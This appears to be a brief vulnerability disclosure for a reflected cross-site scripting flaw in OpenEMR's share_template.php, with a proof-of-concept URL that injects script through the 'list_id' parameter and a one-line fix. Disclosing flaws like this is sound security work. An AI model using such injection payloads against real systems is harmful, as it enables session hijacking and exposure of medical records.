Description

There exist a reflected XSS in /library/custom_template/share_template.php in the ‘list_id’ parameter.

Proof of Concept

http://openemr.local/library/custom_template/share_template.php?list_id=1}});}}alert(1);function%20x(){if(1){a=({a:{a:1

fix

properly sanitize the list_id parameter.